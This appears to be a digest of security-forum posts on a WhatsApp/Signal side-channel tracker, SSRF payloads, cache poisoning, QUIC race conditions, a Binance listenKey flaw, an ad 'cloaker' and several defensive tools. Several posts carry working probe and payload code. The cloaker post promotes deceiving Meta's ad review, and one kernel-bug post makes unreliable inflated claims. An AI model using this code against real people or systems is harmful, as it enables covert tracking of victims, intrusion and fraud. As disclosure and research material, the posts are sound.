I’ve been playing with the “Careless Whisper” side-channel idea and hacked together a small PoC that shows how you can track a phone’s device activity state (screen on/off, offline) via WhatsApp – without any notifications or visible messages on the victim’s side.
How it works (very roughly):
- uses WhatsApp via an unofficial API
- sends tiny “probe” reactions to special/invalid message IDs
- WhatsApp still sends back silent delivery receipts
- I just measure the round-trip time (RTT) of those receipts
From that, you start seeing patterns like:
- low RTT ≈ screen on / active, usually on Wi-Fi
- a bit higher RTT ≈ screen on / active, on mobile data
- high RTT ≈ screen off / standby on Wi-Fi
- very high RTT ≈ screen off / standby on mobile data / bad reception
- timeouts / repeated failures ≈ offline (airplane mode, no network, etc.)
*Exact RTT thresholds depend on the device and network.
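To make that concrete, here is a minimal sketch of the probe loop. The client wrapper calls (`send_reaction`, `wait_for_receipt`) are hypothetical stand-ins for whatever unofficial WhatsApp API library you use, and the thresholds are invented:

```python
import time
import statistics

PROBE_MSG_ID = "INVALID-PROBE-ID"  # special/invalid message ID; the reaction is never rendered

def probe_rtt(client, target_jid, timeout=30.0):
    """Send one silent probe reaction; return the receipt RTT in seconds (None = timeout)."""
    start = time.monotonic()
    client.send_reaction(target_jid, PROBE_MSG_ID, "👍")      # hypothetical wrapper call
    if client.wait_for_receipt(target_jid, timeout=timeout):  # silent delivery receipt
        return time.monotonic() - start
    return None

def classify(rtts):
    """Map a window of RTT samples to a rough device state (thresholds are guesses)."""
    valid = [r for r in rtts if r is not None]
    if not valid:
        return "offline (airplane mode, no network)"
    m = statistics.median(valid)
    if m < 0.5:
        return "screen on (Wi-Fi)"
    if m < 1.5:
        return "screen on (mobile data)"
    if m < 5.0:
        return "standby (Wi-Fi)"
    return "standby (mobile data / bad reception)"
```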
The target never sees any message, notification or reaction. The same class of leak exists for Signal as well (per the original paper).
In theory you’d still see this in raw network traffic (weird, regular probe pattern), and on the victim side it will slowly burn through a bit more mobile data and battery than “normal” idle usage.
Over time you can use this to infer behavior:
- when someone is probably at home (stable Wi-Fi RTT)
- when they’re likely sleeping (long standby/offline stretches)
- when they’re out and moving around (mobile data RTT patterns)
So in theory you can slowly build a profile of when a person is home, asleep, or out — and this kind of tracking could already be happening without people realizing it.
Quick “hotfix” for normal users:
Go into the privacy settings of WhatsApp and Signal and restrict whether unknown numbers can message you at all (e.g. WhatsApp: Settings → Privacy → Advanced). The attack basically requires that someone can send stuff to your number in the first place – limiting that already kills a big chunk of the risk.
My open-source implementation (research / educational use only): https://github.com/gommzystudio/device-activity-tracker
Original Paper:
https://arxiv.org/abs/2411.11194
I've been experimenting with a CDP-based technique for tracing the origin of JavaScript values inside modern, framework-heavy SPAs.
The method, called Breakpoint-Driven Heap Search (BDHS), performs step-out-based debugger pauses, captures a heap snapshot at each pause, and searches each snapshot for a target value (object, string, primitive, nested structure, or similarity signature).
It identifies the user-land function where the value first appears, avoiding framework and vendor noise via heuristics.
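For reference, a stripped-down sketch of one BDHS iteration over raw CDP. The method names are real Chrome DevTools Protocol methods; the orchestration is simplified and the heuristics for skipping framework/vendor frames are omitted:

```python
import json
import websocket  # pip install websocket-client

def bdhs_search(ws_url, needle, max_pauses=20):
    """Pause, snapshot, search; step out and repeat until `needle` appears in the heap."""
    ws = websocket.create_connection(ws_url)  # the page's CDP debugger endpoint
    mid = [0]

    def call(method, params=None):
        mid[0] += 1
        ws.send(json.dumps({"id": mid[0], "method": method, "params": params or {}}))
        return mid[0]

    call("Debugger.enable")
    call("Debugger.pause")  # break at the next JS statement
    for _ in range(max_pauses):
        # wait for the pause and record the current call frames
        while True:
            msg = json.loads(ws.recv())
            if msg.get("method") == "Debugger.paused":
                frames = msg["params"]["callFrames"]
                break
        # capture a heap snapshot at this pause; chunks stream in as events,
        # and the command's own reply signals completion
        chunks, snap_id = [], call("HeapProfiler.takeHeapSnapshot")
        while True:
            msg = json.loads(ws.recv())
            if msg.get("method") == "HeapProfiler.addHeapSnapshotChunk":
                chunks.append(msg["params"]["chunk"])
            elif msg.get("id") == snap_id:
                break
        if needle in "".join(chunks):
            top = frames[0]  # first pause where the value is live
            return top["functionName"], top["url"]
        call("Debugger.stepOut")  # resumes and pauses again one frame up
    return None
```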
Alongside BDHS, I also implemented a Live Object Search that inspects the live heap (not just snapshots), matches objects by regex or structure, and allows runtime patching of matched objects.
This is useful for analyzing bot-detection logic, state machines, tainted values, or any internal object that never surfaces in the global scope.
Potential use cases: SPA reverse engineering, DOM XSS investigations, taint analysis, anti-bot logic tracing, debugging minified/obfuscated flows, and correlating network payloads with memory structures.
Hi, during our work as pentesters we have developed internal tooling for different types of tests. We thought it would be helpful to release a web version of our SSRF payload generator, which has come in handy many times.
It is particularly useful for testing PDF generators when HTML tags may be inserted in the final document. We're aiming for a similar feel to PortSwigger's XSS cheat sheet. The generator includes various payload types for different SSRF scenarios with multiple encoding options.
It works by combining different features: schemes (dict:, dns:, file:, gopher:, etc.) with templates (<img src="{u}">, <meta http-equiv="refresh" content="0;url={u}">, etc.), plus extras like local file paths and static hosts. The result is a large number of payloads to test.
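The combinatorial idea boils down to something like this toy sketch (my illustration, not the site's actual code; hosts and templates are trimmed down):

```python
from itertools import product
from urllib.parse import quote

schemes = ["http://", "dict://", "gopher://", "file://"]
hosts = ["127.0.0.1", "169.254.169.254", "{cb}"]  # {cb} = your callback host
templates = [
    '<img src="{u}">',
    '<meta http-equiv="refresh" content="0;url={u}">',
    '<iframe src="{u}"></iframe>',
]

def generate(callback):
    payloads = []
    for scheme, host, tpl in product(schemes, hosts, templates):
        url = scheme + host.format(cb=callback)
        payloads.append(tpl.format(u=url))         # raw
        payloads.append(tpl.format(u=quote(url)))  # URL-encoded variant
    return payloads

print("\n".join(generate("collaborator.example")))
```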
Enter your callback URL, hit "Generate Payloads", then copy everything to the clipboard and paste it into Burp. Note that there are a number of predefined hosts as well, like 127.0.0.1.
No tracking or ads on the site, everything is client-side.
Best Regards!
Edit: holy s**t the embed image is large
AI/LLM Red Team Handbook and Field Manual
I've published a handbook for penetration testing AI systems and LLMs: https://cph-sec.gitbook.io/ai-llm-red-team-handbook-and-field-manual
Target audience: pentesters, red teamers, and security researchers assessing AI-integrated applications, chatbots, and LLM implementations.
Open to feedback and contributions from the community.
Beginners and even experienced phishers often confuse the approaches used when phishing, resulting in failed campaigns and poor results. I did a short writeup describing each approach.
Rolling out a small research utility I have been building. It provides a simple way to look up proof-of-concept exploit links associated with a given CVE. It is not a vulnerability database. It is a discovery surface that points directly to the underlying code. Anyone can test it, inspect it, or fold it into their own workflow.
A small rate limit is in place to stop automated scraping. The limit is visible at:
https://labs.jamessawyer.co.uk/cves/api/whoami
An API layer sits behind it. A CVE query looks like:
curl -i "https://labs.jamessawyer.co.uk/cves/api/cves?q=CVE-2025-0282"
The web UI is at:
Most open-source L7 DDoS mitigation and bot-protection approaches rely on challenges (e.g., CAPTCHA or JavaScript proof-of-work) or static rules based on the User-Agent, Referer, or client geolocation. These techniques are increasingly ineffective, as they are easily bypassed by modern open-source impersonation libraries and paid cloud proxy networks.
We explore a different approach: classifying HTTP client requests in near real time using ClickHouse as the primary analytics backend.
We collect access logs directly from Tempesta FW, a high-performance open-source hybrid of an HTTP reverse proxy and a firewall. Tempesta FW implements zero-copy per-CPU log shipping into ClickHouse, so the dataset growth rate is limited only by ClickHouse bulk ingestion performance - which is very high.
WebShield is a small open-source Python daemon that:
periodically executes analytic queries to detect spikes in traffic (requests or bytes per second), response delays, surges in HTTP error codes, and other anomalies;
upon detecting a spike, classifies the clients and validates the current model;
if the model is validated, automatically blocks malicious clients by IP, TLS fingerprint, or HTTP fingerprint (a rough sketch of this loop is below).
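A heavily simplified sketch of that detect → classify → block loop against ClickHouse. The table/column names and thresholds here are my assumptions, not Tempesta FW's actual schema:

```python
import time
import clickhouse_connect  # pip install clickhouse-connect

client = clickhouse_connect.get_client(host="localhost")
BASELINE_RPS = 500  # the real daemon derives this from historical traffic

SPIKE_SQL = """
    SELECT count() / 10 AS rps
    FROM access_log
    WHERE timestamp > now() - INTERVAL 10 SECOND
"""
TOP_CLIENTS_SQL = """
    SELECT address, tls_fingerprint, count() AS reqs
    FROM access_log
    WHERE timestamp > now() - INTERVAL 10 SECOND
    GROUP BY address, tls_fingerprint
    ORDER BY reqs DESC
    LIMIT 100
"""

def block(address, fingerprint):
    # placeholder: push a block rule to the proxy/firewall
    print(f"blocking {address} (tls fp {fingerprint})")

while True:
    rps = client.query(SPIKE_SQL).result_rows[0][0]
    if rps > 3 * BASELINE_RPS:  # crude spike detector
        for address, fp, reqs in client.query(TOP_CLIENTS_SQL).result_rows:
            if reqs / 10 > 0.05 * rps:  # one client is >5% of total traffic
                block(address, fp)
    time.sleep(10)
```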
To simplify and accelerate classification — whether automatic or manual — we introduced a new TLS fingerprinting method.
WebShield is a small and simple daemon, yet it is effective against multi-thousand-IP botnets.
The full article includes configuration examples, ClickHouse schemas, and queries.
Hey everyone, heads up: I'm going to use AI to explain all this. The deal is I patented a thesis and was testing it out on Google's bug bounty program. I proved my work true.

What happened I couldn't believe: total systemic kernel failure! I found 15 vulnerabilities in 5 hours. I turned them in to Google and demanded escalation. They closed every single one of them as frivolous. The thing is, I have the patented solution for their failure.

Anyway, I've been working on a deeply unstable process interaction that appears to leverage several non-atomic file operations within the Linux VFS (Virtual File System) layer. The initial finding focused on a classic Local Privilege Escalation (LPE) race condition, but further analysis revealed about 15 different patterns where similar non-atomic functions could be exploited under specific high-stress timing conditions. The core issue seems to stem from a fundamental architectural oversight where certain file security checks and the subsequent critical operations (rename, chown, etc.) are not treated as a single, uninterruptible transaction (an atomic operation).

My situation & mitigation: I have developed a full Proof-of-Concept (PoC) for the most critical LPE. I have implemented an aggressive, real-time countermeasure (a Time Slice Watchdog) on my own systems to detect and block exploitation attempts based on abnormal CPU time usage during the race window. This mitigation is currently running successfully. I also have detailed technical documentation explaining the root cause, the affected functions, and the required kernel-level mitigation (using atomic primitives).

The critical question: where is the best place to submit this?
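For readers unfamiliar with the bug class being described, the textbook check-then-use (TOCTOU) shape looks like this in Python (the general pattern, not the OP's PoC):

```python
import os

# Classic TOCTOU: the check and the use are two separate, non-atomic syscalls,
# so an attacker can swap the path (e.g. replace the file with a symlink to
# /etc/shadow) in the window between them.
path = "/tmp/report.txt"

if os.access(path, os.W_OK):       # 1. security check
    # <-- race window: attacker re-points `path` here
    with open(path, "w") as f:     # 2. critical operation
        f.write("data")

# Mitigation in the same spirit the OP describes: collapse check and use into
# one atomic operation, e.g. open with O_NOFOLLOW and handle the failure
# instead of checking first.
fd = os.open(path, os.O_WRONLY | os.O_NOFOLLOW)
os.close(fd)
```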
Hi guys, I created this synthetic dataset of HTTP requests that are either benign or malicious. I am looking for some feedback on the contents of this dataset and how to make it useful for real world cases.
Hey everyone, if you manage cloud infrastructure, Kubernetes, or container workloads and use tools like CSPM / CNAPP / runtime protection / WAF / IDS, you probably hope they catch real attacks. But how do you know they work under real-world conditions?
That’s where ARMO CTRL comes in: it’s a free, controlled attack lab that helps you simulate real web-to-cloud attacks and validate whether your security stack actually detects them.
Hi everyone,
I've been doing a deep dive into Cache Poisoning to understand how the vulnerability class has evolved over the last decade.
While modern attacks involve complex gadgets and framework confusion, I realized that to truly understand them, you have to look at the "Foundational" attacks—the early logic flaws that started it all.
I analyzed 8 historical case studies from public bug bounty reports. Here are the 3 most interesting patterns that paved the way for modern exploitation:
1. The HackerOne Classic (2014)
The application used the X-Forwarded-Host header without validation. Sending X-Forwarded-Host: evil.com caused the application to generate a redirect to the attacker's domain, and the cache served that redirect to subsequent visitors.
2. GitHub's Content-Type DoS
The application handled Content-Type headers differently for the cache vs. the backend; that mismatch is what enabled the denial of service.
3. The Cloudflare Capitalization Bug
The cache normalized host capitalization (TaRgEt.CoM to target.com for the cache key), but the origin server treated them as distinct, so a response generated for the oddly-cased host ended up cached under the normal key.
Why this matters today: even though these are "old" reports, these exact logic flaws (normalization issues, unkeyed headers) are what cause the complex CP-DoS and secondary-context attacks we see in modern frameworks like Next.js today.
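To make pattern #1 concrete, here's roughly how you'd probe for an unkeyed X-Forwarded-Host today (my sketch; the URL and cache-buster are placeholders, and you should only test targets you're authorized for):

```python
import requests

target = "https://example.com/?cb=unique123"  # cache-buster isolates this test

# 1. Send the poisoned request
requests.get(target, headers={"X-Forwarded-Host": "evil.example"})

# 2. Re-request WITHOUT the header: if the injected host is reflected, the
#    cache stored the poisoned response and now serves it to everyone.
clean = requests.get(target)
if "evil.example" in clean.text:
    print("cache poisoned via unkeyed X-Forwarded-Host")
```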
I wrote a full breakdown of all 8 case studies (including Shopify, GitLab, and Red Hat) if you want to see the specific request/response pairs.
Read the Full Analysis (Part 1)
Let me know if you have any questions about the mechanics of these early bugs!
Just came across this reverse engineering challenge called Malware Busters; it seems to be part of the Cloud Security Championship. It’s got a nice malware analysis vibe, mostly assembly focused and pretty clean in terms of setup.
Was surprised by the polish. Has anyone else given it a try?
An anonymized real-world case study on multi-source analysis (firmware, IaC, FMS, telemetry, network traffic, web stack) using CAI + MCP.
This writeup details innovative ‘syntax confusion’ techniques exploiting how two or more components can interpret the same input differently due to ambiguous or inconsistent syntax rules.
Alex Brumen aka Brumens provides step-by-step guidance, supported by practical examples, on crafting payloads to confuse syntaxes and parsers – enabling filter bypasses and real-world exploitation.
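As a toy illustration of the idea (mine, not from the talk): a naive allowlist filter and a real URL parser can disagree about the host of the same string.

```python
import re
from urllib.parse import urlparse

url = "http://trusted.example@evil.example/"

# Component 1: a naive filter "validates" the URL with a prefix check
assert re.match(r"^http://trusted\.example", url)  # passes the filter

# Component 2: an HTTP client's parser sends the request to evil.example,
# because everything before '@' is userinfo, not the host
print(urlparse(url).hostname)  # -> evil.example
```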
This research was originally presented at NahamCon 2025.
Author here.
Zero the Hero (0tH) is a Mach-O structural analysis tool written in Rust.
It parses FAT binaries, load commands, slices, CodeSignature/SuperBlob, DER entitlements, requirements bytecode, and CodeDirectory versions.
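As a taste of the first step involved, here's a minimal FAT-header walk in Python (my sketch, not 0tH's Rust; fat64 and error handling are omitted). All multi-byte fields in the fat header are big-endian:

```python
import struct

FAT_MAGIC = 0xCAFEBABE  # 32-bit fat header (fat64 uses 0xCAFEBABF)

def list_slices(path):
    """Yield (cputype, offset, size) for each architecture slice in a FAT binary."""
    with open(path, "rb") as f:
        magic, nfat_arch = struct.unpack(">II", f.read(8))
        if magic != FAT_MAGIC:
            raise ValueError("not a 32-bit FAT Mach-O")
        for _ in range(nfat_arch):
            cputype, _cpusubtype, offset, size, _align = struct.unpack(">iiIII", f.read(20))
            yield cputype, offset, size

for cputype, offset, size in list_slices("/bin/ls"):
    print(f"cputype={cputype:#x} offset={offset:#x} size={size}")
```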
The binary is universal (Intel + ARM64), notarized and stapled.
Motivation: existing tools lack full coverage of modern Mach-O signature internals.
Docs: https://zero-the-hero.run/docs
Happy to discuss signature internals or Mach-O specifics.
Think prepared statements automatically make your Node.js apps secure? Think again.
In my latest blog post, I explore a surprising edge case in the mysql and mysql2 packages that can turn “safe” prepared statements into exploitable SQL injection vulnerabilities.
If you use Node.js and rely on prepared statements (as you should be!), this is a must-read: https://blog.mantrainfosec.com/blog/18/prepared-statements-prepared-to-be-vulnerable
My talk about Lateral Movement in the context of logged-in user sessions 🙌
Curious what frameworks people use for desktop application testing. I run a pentesting firm that does thick clients for enterprise, and we couldn't find anything comprehensive for this.
Ended up building DASVS over the past 5 years - basically ASVS but for desktop applications. Covers desktop-specific stuff like local data storage, IPC security, update mechanisms, and memory handling that web testing frameworks miss. Been using it internally for thick client testing, but you can only see so much from one angle. Just open-sourced it because it could be useful beyond just us.
The goal is to get it to where ASVS is: community-driven, comprehensive, and actually used.
To people who do desktop application testing, what is wrong or missing? Where do you see gaps that should be addressed? In the pipeline, we have testing guides per OS and an automated assessment tool inspired by MobSF. What do you use now for desktop application testing? And what would make a framework like this actually useful?
Hi everyone,
I'm sharing a new open-source tool I developed: the Ephemeral Vulnerability Scanner.
If you're tired of using security tools that require you to send sensitive lists of your installed software to a 3rd party server, this is your solution.
It uses your OS's native package listing (e.g. dpkg -l, brew list) to generate a local inventory.json file, which you then load into index.html in your browser. The core benefit is privacy: your inventory never leaves your control. Analysis is ephemeral: everything is gone when you close the tab.
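The inventory step amounts to something like this (a sketch of the idea for Debian-based systems; the real tool's script and JSON shape may differ):

```python
import json
import subprocess

# Dump installed packages locally; nothing leaves the host.
out = subprocess.run(
    ["dpkg-query", "-W", "-f", "${Package} ${Version}\n"],
    capture_output=True, text=True, check=True,
).stdout

inventory = [
    {"name": name, "version": version}
    for name, version in (line.split(" ", 1) for line in out.splitlines() if " " in line)
]

with open("inventory.json", "w") as f:
    json.dump(inventory, f, indent=2)
```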
It supports Windows, Linux, and macOS, giving you a unified, free way to scan packages across your fleet.
Feedback and contributions are highly welcome!
We've just released a tool that fixes a particularly annoying problem for those trying to fuzz HTTP/3.
The issue is that QUIC is designed to prevent head-of-line (HOL) blocking, which is beneficial, but it disrupts the fundamental timing control required for exploiting application-level race conditions. We tried all the obvious solutions, but QUIC's RFC essentially rules out fragmentation and other low-level network tricks. 🤷♂️
So, we figured out a way to synchronize things at the QUIC stream layer using a technique we call Quic-Fin-Sync.
The gist: send every request but withhold its final STREAM frame, then ship all the FIN bits together in a single UDP datagram.
This one packet forces the server to "release" all the requests into processing near-simultaneously. It worked way better than existing methods in our tests—we successfully raced a vulnerable Keycloak setup over 40 times.
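A rough reconstruction of that idea using aioquic primitives (my sketch, not the released tool; assumes `conn` is an established QuicConnection and `requests` maps stream IDs to fully encoded HTTP/3 request bytes):

```python
import time
from aioquic.quic.connection import QuicConnection

def fin_sync(conn: QuicConnection, sock, addr, requests: dict):
    """Hold back every stream's FIN, then flush them together."""
    # Phase 1: send each request minus its last byte, with no FIN --
    # the server buffers the incomplete requests and cannot start processing.
    for stream_id, payload in requests.items():
        conn.send_stream_data(stream_id, payload[:-1], end_stream=False)
    for datagram, _ in conn.datagrams_to_send(now=time.time()):
        sock.sendto(datagram, addr)

    # Phase 2: queue the final byte + FIN of every stream, then flush once.
    # aioquic coalesces the tiny STREAM frames, so the FINs land together
    # and the server releases all requests near-simultaneously.
    for stream_id, payload in requests.items():
        conn.send_stream_data(stream_id, payload[-1:], end_stream=True)
    for datagram, _ in conn.datagrams_to_send(now=time.time()):
        sock.sendto(datagram, addr)
```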
If you are pentesting HTTP/3, grab the open-source tool and let us know what you break with it. The full write-up is below.
What’s the most frustrating thing you’ve run into trying to test QUIC/HTTP/3?
Hey bro 👾
Wanna take on a friendly challenge?
I built a cloaker that’s been flying under Meta’s radar — and I want to see if you can break it.
The challenge is simple:
🧠 Try to identify any vulnerabilities or leaks in the cloaker system I’m using.
🚀 If you manage to break it or point out a real flaw, I’ll send you a little prize (or maybe a project if you impress me).
Hint:
The ad on Meta shows one thing...
But the landing page is completely different from the advertised offer.
Let’s see if you’re sharp enough to catch it 😏
Game on?
Hi all,
I’ve published a technical case study analyzing a design issue in how the Binance API enforces IP whitelisting. This is not about account takeover or fund theft — it’s about a trust-boundary mismatch between the API key and the secondary listenKey used for WebSocket streams.
This is not a direct account compromise.
It’s market-intelligence leakage, which can be extremely valuable when aggregated across many users or bot frameworks.
Many users rely on IP whitelisting as their final defensive barrier. The listenKey silently bypasses that assumption. This creates a false sense of security and enables unexpected data exposure patterns that users are not aware of.
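To show the boundary concretely, here's a minimal sketch of the flow (real Binance spot endpoints as I understand them; verify against current docs before relying on this):

```python
import requests
import websocket  # pip install websocket-client

API_KEY = "..."  # whitelisted: only your server's IP may call the REST API

# Step 1 (from the whitelisted IP): mint a listenKey for the user data stream
r = requests.post("https://api.binance.com/api/v3/userDataStream",
                  headers={"X-MBX-APIKEY": API_KEY})
listen_key = r.json()["listenKey"]

# Step 2 (from ANY IP): the listenKey is a plain bearer token -- the
# WebSocket endpoint never re-checks the IP whitelist, so whoever holds
# it can consume the stream.
ws = websocket.create_connection(
    f"wss://stream.binance.com:9443/ws/{listen_key}")
print(ws.recv())  # account/order events flow to an unwhitelisted host
```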
I responsibly reported this and waited ~11 months.
The issue was repeatedly categorized as “social engineering,” despite clear architectural implications. Therefore, I have published the analysis openly.
Shai-Hulud second attack analysis: over 300 npm packages and 21K GitHub repos infected via a fake Bun runtime within hours